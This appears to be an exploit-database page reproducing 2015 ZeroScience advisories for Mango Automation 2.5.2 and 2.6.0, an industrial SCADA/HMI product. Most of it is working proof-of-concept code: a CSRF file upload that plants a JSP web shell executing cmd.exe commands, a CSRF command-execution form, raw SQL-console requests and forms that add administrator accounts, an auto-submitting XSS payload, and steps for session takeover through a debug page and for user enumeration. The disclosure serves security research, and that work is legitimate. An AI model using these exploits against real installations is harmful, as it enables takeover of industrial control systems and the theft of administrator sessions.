"Mango Automation 2.6.0 - Multiple Vulnerabilities"

Author

Exploit author

LiquidWorm

Platform

Exploit platform

jsp

Release date

Exploit published date

2015-09-28

                
                    
                         Download file
                    
                
            
Mango Automation 2.6.0 CSRF File Upload And Arbitrary JSP Code Execution


Vendor: Infinite Automation Systems Inc.
Product web page: http://www.infiniteautomation.com/
Affected version: 2.5.2 and 2.6.0 beta (build 327)

Summary: Mango Automation is a flexible SCADA, HMI And Automation software application that allows you
to view, log, graph, animate, alarm, and report on data from sensors, equipment, PLCs, databases, webpages,
etc. It is easy, affordable, and open source.

Desc: Mango suffers from an authenticated arbitrary JSP code execution. The vulnerability is caused due
to the improper verification of uploaded image files in 'graphicalViewsBackgroundUpload' script via the
'backgroundImage' POST parameter which allows of arbitrary files being uploaded in '/modules/graphicalViews/web/graphicalViewUploads/'.
This can be exploited to execute arbitrary JSP code by uploading a malicious JSP script file that will be
stored as a sequence number depending on how many files were uploaded (1.jsp or 2.jsp or 3.jsp .. n.jsp).

Tested on: Microsoft Windows 7 Professional SP1 (EN) 32/64bit
           Microsoft Windows 7 Ultimate SP1 (EN) 32/64bit
           Jetty(9.2.2.v20140723)
           Java(TM) SE Runtime Environment (build 1.8.0_51-b16)
           Java HotSpot(TM) Client VM (build 25.51-b03, mixed mode)


Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
                            @zeroscience


Advisory ID: ZSL-2015-5262
Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2015-5262.php


20.08.2015

--


<html>
  <body>
    <script>
      function submitRequest()
      {
        var xhr = new XMLHttpRequest();
        xhr.open("POST", "http://localhost:8080/graphicalViewsBackgroundUpload", true);
        xhr.setRequestHeader("Accept", "text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8");
        xhr.setRequestHeader("Content-Type", "multipart/form-data; boundary=----WebKitFormBoundaryb8cxmjBwpzDcHUVI");
        xhr.setRequestHeader("Accept-Language", "en-US,en;q=0.8");
        xhr.withCredentials = true;
        var body = "------WebKitFormBoundaryb8cxmjBwpzDcHUVI\r\n" + 
          "Content-Disposition: form-data; name=\"backgroundImage\"; filename=\"cmd.jsp\"\r\n" + 
          "Content-Type: application/octet-stream\r\n" + 
          "\r\n" + 
          "\x3c%@ page import=\"java.util.*,java.io.*,java.net.*\"%\x3e\r\n" + 
          "\x3cHTML\x3e\x3cBODY\x3e\r\n" + 
          "\x3cFORM METHOD=\"POST\" NAME=\"myform\" ACTION=\"\"\x3e\r\n" + 
          "\x3cINPUT TYPE=\"text\" NAME=\"cmd\"\x3e\r\n" + 
          "\x3cINPUT TYPE=\"submit\" VALUE=\"Send\"\x3e\r\n" + 
          "\x3c/FORM\x3e\r\n" + 
          "\x3cpre\x3e\r\n" + 
          "\x3c%\r\n" + 
          "if (request.getParameter(\"cmd\") != null) {\r\n" + 
          "        out.println(\"Command: \" + request.getParameter(\"cmd\") + \"\\n\x3cBR\x3e\");\r\n" + 
          "        Process p = Runtime.getRuntime().exec(\"cmd.exe /c \" + request.getParameter(\"cmd\"));\r\n" + 
          "        OutputStream os = p.getOutputStream();\r\n" + 
          "        InputStream in = p.getInputStream();\r\n" + 
          "        DataInputStream dis = new DataInputStream(in);\r\n" + 
          "        String disr = dis.readLine();\r\n" + 
          "        while ( disr != null ) {\r\n" + 
          "                out.println(disr); disr = dis.readLine(); }\r\n" + 
          "        }\r\n" + 
          "%\x3e\r\n" + 
          "\x3c/pre\x3e\r\n" + 
          "\x3c/BODY\x3e\x3c/HTML\x3e\r\n" + 
          "------WebKitFormBoundaryb8cxmjBwpzDcHUVI--\r\n";
        var aBody = new Uint8Array(body.length);
        for (var i = 0; i < aBody.length; i++)
          aBody[i] = body.charCodeAt(i); 
        xhr.send(new Blob([aBody]));
      }
    </script>
    <form action="#">
      <input type="button" value="Submit request" onclick="submitRequest();" />
    </form>
  </body>
</html>


Webshell: http://localhost:8080/modules/graphicalViews/web/graphicalViewUploads/17.jsp

#################################################################

Mango Automation 2.6.0 CSRF Arbitrary Command Execution Exploit


Advisory ID: ZSL-2015-5261
Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2015-5261.php


20.08.2015

--


<html>
  <body>
    <form action="http://localhost:8080/dwr/call/plaincall/EventHandlersDwr.testProcessCommand.dwr" method="POST">
      <input type="hidden" name="callCount" value="1" />
      <input type="hidden" name="page" value="&#47;event&#95;handlers&#46;shtm" />
      <input type="hidden" name="httpSessionId" value="&#13;" />
      <input type="hidden" name="scriptSessionId" value="26D579040C1C11D2E21D1E5F321094E5866" />
      <input type="hidden" name="c0&#45;scriptName" value="EventHandlersDwr" />
      <input type="hidden" name="c0&#45;methodName" value="testProcessCommand" />
      <input type="hidden" name="c0&#45;id" value="0" />
      <input type="hidden" name="c0&#45;param0" value="string&#58;C&#58;&#92;&#92;windows&#92;&#92;system32&#92;&#92;calc&#46;exe" />
      <input type="hidden" name="c0&#45;param1" value="string&#58;15" />
      <input type="hidden" name="batchId" value="24" />
      <input type="submit" value="Submit request" />
    </form>
  </body>
</html>

#################################################################

Mango Automation 2.6.0 Unprotected Debug Log View Vulnerability


Advisory ID: ZSL-2015-5260
Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2015-5260.php


20.08.2015

--


One scenario is where the attacker visits the following URL and takes over the admin session (given that the administrator didn't manually disabled the debugging and has produced some exception in current session):

 - http://localhost:8080/status/
 
Other scenario is where the attacker sends a link to the victim so the victim after clicking on the link, generates exception and writes all his session attributes in the status page:

 - http://localhost/status/mango.json?time=$
 - http://localhost/status/


Sample status output:
\"$\"\r\n\r\n\r\nSESSION ATTRIBUTES\r\n   sessionUser=User [id=6, username=n00b, password=NWoZK3kTsExUV00Ywo1G5jlUKKs=, email=z@s.l, phone=123321, admin=true, disabled=false, dataSourcePermissions=[], dataPointPermissions=[], homeUrl=, lastLogin=1440142956496, receiveAlarmEmails=0, receiveOwnAuditEvents=false, timezone=]\r\n   LONG_POLL_DATA_TIMEOUT=1440143583487\r\n   LONG_POLL_DATA=[com.serotonin.m2m2.web.dwr.longPoll.LongPollData@839308, com.serotonin.m2m2.web.dwr.longPoll.LongPollData@1b4dafa]\r\n\r\n\r\nCONTEXT ATTRIBUTES\r\n   DwrContainer=org.directwebremoting.impl.DefaultContainer@138158\r\n   constants.EventType.EventTypeNames.AUDIT=AUDIT\r\n   constants.SystemEventType.TYPE_USER_LOGIN=USER_LOGIN\r\n   constants.Permissions.DataPointAccessTypes.READ=1\r\n   org.directwebremoting.ContainerList=[org.directwebremoting.impl.DefaultContainer@138158]\r\n   constants.DataTypes.BINARY=1\r\n   constants.UserComment.TYPE_EVENT=1\r\n   constants.SystemEventType.TYPE_SYSTEM_STARTUP=SYSTEM_STARTUP\r\n   javax.servlet.ServletConfig=org.eclipse.jetty.servlet.ServletHolder$Config@bc620e\r\n   


Also you can list all of the Classes known to DWR:

 - http://localhost:8080/dwr/index.html

#################################################################

Mango Automation 2.6.0 CSRF Arbitrary SQL Query Execution

Advisory ID: ZSL-2015-5259
Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2015-5259.php


20.08.2015

--


SQL query in version 2.5.2 (pass 123123) with hash injection:
-------------------------------------------------------------
INSERT INTO USERS VALUES(1337,'gjoko','YB8YiWZ++uuzO4wSVyg12j8Cf3g=','gjoko@z.sl','','Y','N',1440075860103,'','0','N','','Y');
1 records(s) updated.


SQL query in version 2.6.0 beta build 327 (pass 123123) with hash injection:
----------------------------------------------------------------------------
INSERT INTO USERS VALUES(1337,'gjoko','YB8YiWZ++uuzO4wSVyg12j8Cf3g=','gjoko@z.sl','','N',1440075860103,'','0','N','','Y','superadmin');
1 records(s) updated.

USERS table:
ID USERNAME PASSWORD EMAIL PHONE DISABLED LASTLOGIN HOMEURL RECEIVEALARMEMAILS RECEIVEOWNAUDITEVENTS TIMEZONE MUTED PERMISSIONS

1.

POST /sqlConsole.shtm HTTP/1.1
Host: localhost:8080
Content-Length: 51
Cache-Control: max-age=0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Origin: http://localhost:8080
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.155 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Referer: http://localhost:8080/sqlConsole.shtm
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.8
Cookie: MANGO8080=13208s4v50p7duy7hjzmxetz1

sqlString=select+*+from+users%3B&query=Submit+query


2. 

POST /sqlConsole.shtm HTTP/1.1
Host: localhost:8080
Content-Length: 54
Cache-Control: max-age=0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Origin: http://localhost:8080
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.155 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Referer: http://localhost:8080/sqlConsole.shtm
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.8
Cookie: MANGO8080=13208s4v50p7duy7hjzmxetz1

sqlString=select+*+from+users%3B&tables=Get+table+list


3. 


POST /sqlConsole.shtm HTTP/1.1
Host: localhost:8080
Content-Length: 246
Cache-Control: max-age=0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Origin: http://localhost:8080
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.155 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Referer: http://localhost:8080/sqlConsole.shtm
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.8
Cookie: MANGO8080=13208s4v50p7duy7hjzmxetz1

sqlString=INSERT+INTO+USERS+VALUES%289%2C%27gjoko3%27%2C%27YB8YiWZ%2B%2BuuzO4wSVyg12j8Cf3g%3D%27%2C%27gjoko%40z.sl%27%2C%27333222111%27%2C%27Y%27%2C%27N%27%2C1440075860103%2C%27%27%2C%270%27%2C%27N%27%2C%27%27%2C%27Y%27%29%3B&update=Submit+update

#################################################################

Mango Automation 2.6.0 CSRF Add Admin Exploit

Advisory ID: ZSL-2015-5258
Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2015-5258.php


20.08.2015

--

2.5.2:
<!-- user hacker, pass 123123 -->
<html>
  <body>
    <form action="http://localhost:8080/dwr/call/plaincall/UsersDwr.saveUserAdmin.dwr" method="POST" enctype="text/plain">
      <input type="hidden" name="callCount" value="1&#10;page&#61;&#47;users&#46;shtm&#10;httpSessionId&#61;&#10;scriptSessionId&#61;8BD64066486071219EB8691611D48F14109&#10;c0&#45;scriptName&#61;UsersDwr&#10;c0&#45;methodName&#61;saveUserAdmin&#10;c0&#45;id&#61;0&#10;c0&#45;param0&#61;number&#58;&#45;1&#10;c0&#45;param1&#61;string&#58;hacker&#10;c0&#45;param2&#61;string&#58;123123&#10;c0&#45;param3&#61;string&#58;hacker&#37;40hacker&#46;hack&#10;c0&#45;param4&#61;string&#58;111222333&#10;c0&#45;param5&#61;boolean&#58;true&#10;c0&#45;param6&#61;boolean&#58;false&#10;c0&#45;param7&#61;string&#58;0&#10;c0&#45;param8&#61;boolean&#58;false&#10;c0&#45;param9&#61;string&#58;&#10;c0&#45;param10&#61;Array&#58;&#91;&#93;&#10;c0&#45;param11&#61;Array&#58;&#91;&#93;&#10;batchId&#61;5&#10;" />
      <input type="submit" value="Submit request 1" />
    </form>
  </body>
</html>


2.6.0 beta (build 327):
<!-- user hacker3, pass admin (in sha1(base64) hash value) -->
<html>
  <body>
    <form action="http://localhost:8080/rest/v1/users.json" method="POST" enctype="text/plain">
      <input type="hidden" name="&#123;&quot;username&quot;&#58;&quot;hacker3&quot;&#44;&quot;password&quot;&#58;&quot;0DPiKuNIrrVmD8IUCuw1hQxNqZc" value="&quot;&#44;&quot;email&quot;&#58;&quot;hacker&#64;zeroscience&#46;mk&quot;&#44;&quot;phone&quot;&#58;&quot;111222333&quot;&#44;&quot;muted&quot;&#58;true&#44;&quot;disabled&quot;&#58;false&#44;&quot;homeUrl&quot;&#58;&quot;http&#58;&#47;&#47;www&#46;zeroscience&#46;mk&quot;&#44;&quot;receiveAlarmEmails&quot;&#58;&quot;NONE&quot;&#44;&quot;receiveOwnAuditEvents&quot;&#58;false&#44;&quot;timezone&quot;&#58;&quot;&quot;&#44;&quot;permissions&quot;&#58;&quot;user&#44;superadmin&quot;&#125;" />
      <input type="submit" value="Submit request 2" />
    </form>
  </body>
</html>

#################################################################

Mango Automation 2.6.0 Remote XSS POST Injection Vulnerability

Advisory ID: ZSL-2015-5257
Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2015-5257.php


20.08.2015

--


<html>
  <head>
    <title>Mango Automation 2.6.0 Remote XSS POST Injection Vulnerability</title>
  </head>
  <body>
    <form name="login" method="post" action="http://localhost:8080/login.htm">
    <input type="hidden" name="username" value='"><script>alert("XSS");</script>' />
    <input type="hidden" name="password" value="blah" />
    </form>
    <script type="text/javascript">
    document.login.submit();
    </script>
  </body>
</html>

#################################################################

Mango Automation 2.6.0 User Enumeration Weakness

Advisory ID: ZSL-2015-5256
Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2015-5256.php


20.08.2015

--


Request for non-existent username:
----------------------------------

POST /login.htm HTTP/1.1
Host: localhost:8080
Content-Length: 29
Cache-Control: max-age=0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Origin: http://localhost:8080
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.101 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Referer: http://localhost:8080/login.htm;jsessionid=6zpfpnxljyzf13l3zrpx9e0xd
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.8
Cookie: MANGO8080=6zpfpnxljyzf13l3zrpx9e0xd

username=noob&password=123123


Response:

 - <td class="formError">User id not found</td>


Request for existent username:
------------------------------

POST /login.htm HTTP/1.1
Host: localhost:8080
Content-Length: 32
Cache-Control: max-age=0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Origin: http://localhost:8080
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.101 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Referer: http://localhost:8080/login.htm
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.8
Cookie: MANGO8080=6zpfpnxljyzf13l3zrpx9e0xd

username=admin&password=123123


Response:

 - <td colspan="3" class="formError">Invalid login<br/>

Release Date	Title	Type	Platform	Author
2020-12-02	"aSc TimeTables 2021.6.2 - Denial of Service (PoC)"	local	windows	"Ismael Nava"
2020-12-02	"Anuko Time Tracker 1.19.23.5311 - No rate Limit on Password Reset functionality"	webapps	php	"Mufaddal Masalawala"
2020-12-02	"Ksix Zigbee Devices - Playback Protection Bypass (PoC)"	remote	multiple	"Alejandro Vazquez Vazquez"
2020-12-02	"Mitel mitel-cs018 - Call Data Information Disclosure"	remote	linux	"Andrea Intilangelo"
2020-12-02	"DotCMS 20.11 - Stored Cross-Site Scripting"	webapps	multiple	"Hardik Solanki"
2020-12-02	"Artworks Gallery 1.0 - Arbitrary File Upload RCE (Authenticated) via Edit Profile"	webapps	multiple	"Shahrukh Iqbal Mirza"
2020-12-02	"ChurchCRM 4.2.0 - CSV/Formula Injection"	webapps	multiple	"Mufaddal Masalawala"
2020-12-02	"ChurchCRM 4.2.1 - Persistent Cross Site Scripting (XSS)"	webapps	multiple	"Mufaddal Masalawala"
2020-12-02	"NewsLister - Authenticated Persistent Cross-Site Scripting"	webapps	multiple	"Emre Aslan"
2020-12-02	"IDT PC Audio 1.0.6433.0 - 'STacSV' Unquoted Service Path"	local	windows	"Manuel Alvarez"

Release Date	Title	Type	Platform	Author
2019-11-12	"Atlassian Confluence 6.15.1 - Directory Traversal"	webapps	jsp	max7253
2019-11-12	"Atlassian Confluence 6.15.1 - Directory Traversal (Metasploit)"	webapps	jsp	max7253
2019-09-16	"NetGain EM Plus 10.1.68 - Remote Command Execution"	webapps	jsp	azams
2019-07-26	"Ahsay Backup 7.x - 8.1.1.50 - Authenticated Arbitrary File Upload / Remote Code Execution"	webapps	jsp	"Wietse Boonstra"
2019-07-26	"Ahsay Backup 7.x - 8.1.1.50 - Authenticated Arbitrary File Upload / Remote Code Execution (Metasploit)"	webapps	jsp	"Wietse Boonstra"
2019-07-26	"Ahsay Backup 7.x - 8.1.1.50 - XML External Entity Injection"	webapps	jsp	"Wietse Boonstra"
2019-06-11	"Liferay Portal 7.1 CE GA=3 / SimpleCaptcha API - Cross-Site Scripting"	webapps	jsp	"Valerio Brussani"
2019-06-05	"Zimbra < 8.8.11 - XML External Entity Injection / Server-Side Request Forgery"	webapps	jsp	k8gege
2019-05-10	"dotCMS 5.1.1 - HTML Injection"	webapps	jsp	"Ismail Tasdelen"
2019-03-11	"OpenKM 6.3.2 < 6.3.7 - Remote Command Execution (Metasploit)"	webapps	jsp	AkkuS

Release Date	Title	Type	Platform	Author
2020-11-05	"iDS6 DSSPro Digital Signage System 6.2 - Improper Access Control Privilege Escalation"	webapps	hardware	LiquidWorm
2020-11-05	"iDS6 DSSPro Digital Signage System 6.2 - Cross-Site Request Forgery (CSRF)"	webapps	hardware	LiquidWorm
2020-11-05	"iDS6 DSSPro Digital Signage System 6.2 - CAPTCHA Security Bypass"	webapps	hardware	LiquidWorm
2020-10-27	"GoAhead Web Server 5.1.1 - Digest Authentication Capture Replay Nonce Reuse"	remote	hardware	LiquidWorm
2020-10-27	"Adtec Digital Multiple Products - Default Hardcoded Credentials Remote Root"	remote	hardware	LiquidWorm
2020-10-27	"TDM Digital Signage PC Player 4.1 - Insecure File Permissions"	local	windows	LiquidWorm
2020-10-26	"ReQuest Serious Play F3 Media Server 7.0.3 - Remote Code Execution (Unauthenticated)"	webapps	hardware	LiquidWorm
2020-10-26	"ReQuest Serious Play F3 Media Server 7.0.3 - Debug Log Disclosure"	webapps	hardware	LiquidWorm
2020-10-26	"ReQuest Serious Play F3 Media Server 7.0.3 - Remote Denial of Service"	webapps	hardware	LiquidWorm
2020-10-26	"ReQuest Serious Play Media Player 3.0 - Directory Traversal File Disclosure"	webapps	hardware	LiquidWorm
2020-10-07	"BACnet Test Server 1.01 - Remote Denial of Service (PoC)"	dos	windows	LiquidWorm
2020-10-01	"SpinetiX Fusion Digital Signage 3.4.8 - Cross-Site Request Forgery (Add Admin)"	webapps	hardware	LiquidWorm
2020-10-01	"BrightSign Digital Signage Diagnostic Web Server 8.2.26 - Server-Side Request Forgery (Unauthenticated)"	webapps	hardware	LiquidWorm
2020-10-01	"SpinetiX Fusion Digital Signage 3.4.8 - Database Backup Disclosure"	webapps	hardware	LiquidWorm
2020-10-01	"SpinetiX Fusion Digital Signage 3.4.8 - Username Enumeration"	webapps	hardware	LiquidWorm
2020-10-01	"BrightSign Digital Signage Diagnostic Web Server 8.2.26 - File Delete Path Traversal"	webapps	hardware	LiquidWorm
2020-10-01	"Sony IPELA Network Camera 1.82.01 - 'ftpclient.cgi' Remote Stack Buffer Overflow"	remote	hardware	LiquidWorm
2020-09-25	"B-swiss 3 Digital Signage System 3.6.5 - Database Disclosure"	webapps	multiple	LiquidWorm
2020-09-25	"B-swiss 3 Digital Signage System 3.6.5 - Cross-Site Request Forgery (Add Maintenance Admin)"	webapps	multiple	LiquidWorm
2020-09-21	"B-swiss 3 Digital Signage System 3.6.5 - Remote Code Execution"	webapps	multiple	LiquidWorm
2020-09-14	"Rapid7 Nexpose Installer 6.6.39 - 'nexposeengine' Unquoted Service Path"	local	windows	LiquidWorm
2020-08-28	"Eibiz i-Media Server Digital Signage 3.8.0 - Privilege Escalation"	webapps	hardware	LiquidWorm
2020-08-26	"Eibiz i-Media Server Digital Signage 3.8.0 - Directory Traversal"	webapps	multiple	LiquidWorm
2020-08-24	"Eibiz i-Media Server Digital Signage 3.8.0 - Configuration Disclosure"	webapps	hardware	LiquidWorm
2020-08-24	"Eibiz i-Media Server Digital Signage 3.8.0 - Authentication Bypass"	webapps	hardware	LiquidWorm
2020-08-17	"QiHang Media Web Digital Signage 3.0.9 - Unauthenticated Arbitrary File Deletion"	webapps	hardware	LiquidWorm
2020-08-17	"QiHang Media Web Digital Signage 3.0.9 - Cleartext Credential Disclosure"	webapps	hardware	LiquidWorm
2020-08-17	"QiHang Media Web Digital Signage 3.0.9 - Unauthenticated Arbitrary File Disclosure"	webapps	hardware	LiquidWorm
2020-08-17	"QiHang Media Web Digital Signage 3.0.9 - Remote Code Execution (Unauthenticated)"	webapps	hardware	LiquidWorm
2020-08-07	"All-Dynamics Digital Signage System 2.0.2 - Cross-Site Request Forgery (Add Admin)"	webapps	hardware	LiquidWorm

import requests

response = requests.get('http://127.0.0.1:8181?format=json')

For full documentation follow the link above

Cipherscan. Find out which SSL ciphersuites are supported by a target.

Cipher	Protocols	Sigalg	Trusted

Identify and fingerprint Web Application Firewall (WAF) products protecting a website.

Host	WAF detected

Whatweb

Dns lookup

Raccoon scanner

Cmseek

WAF detector

DNS reconnaince

Bing IP2Host

Wappalyzer

Waybackurl

HostHunter

WPScan

Apache Users

CORS Scanner

API Docs

ReDoc

OpenAPI

Swagger

Search for hundreds of thousands of exploits

"Mango Automation 2.6.0 - Multiple Vulnerabilities"

Download file

Cipherscan. Find out which SSL ciphersuites are supported by a target.

Identify and fingerprint Web Application Firewall (WAF) products protecting a website.